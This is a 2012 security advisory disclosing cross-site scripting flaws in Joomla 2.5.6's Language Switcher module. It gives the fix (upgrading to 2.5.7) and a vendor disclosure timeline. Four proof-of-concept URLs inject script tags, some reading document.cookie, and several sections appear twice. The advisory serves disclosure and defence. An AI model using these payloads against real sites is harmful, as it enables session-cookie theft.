SSCHADV2012-014 - Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Advisory:
|
Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
|
Advisory ID:
|
SSCHADV2012-014
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Joomla 2.5.6
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
With activated "Module Language Switcher – position-4" (Extensions -> Modules -> Module Manager: Module Language Switcher), multiple XSS are possible.
==============
PoC-Exploit
==============
// with default sample content
http://[target]/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/"><script>alert(‘xss’)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(‘xss’)</script>
=====
Solution
=====
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
PoC-Exploit
==============
// with default sample content
http://[target]/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/"><script>alert(‘xss’)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(‘xss’)</script>
=====
Solution
=====
Upgrade to version 2.5.7
================
Disclosure Timeline
================
28-Jun-2012 – vendor informed (security@joomla.org)
05-Jul-2012 – vendor informed again (security@joomla.org)
Disclosure Timeline
================
28-Jun-2012 – vendor informed (security@joomla.org)
05-Jul-2012 – vendor informed again (security@joomla.org)
13-Sep-2012 – fixed by vendor
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
Comments
Display comments as Linear | Threaded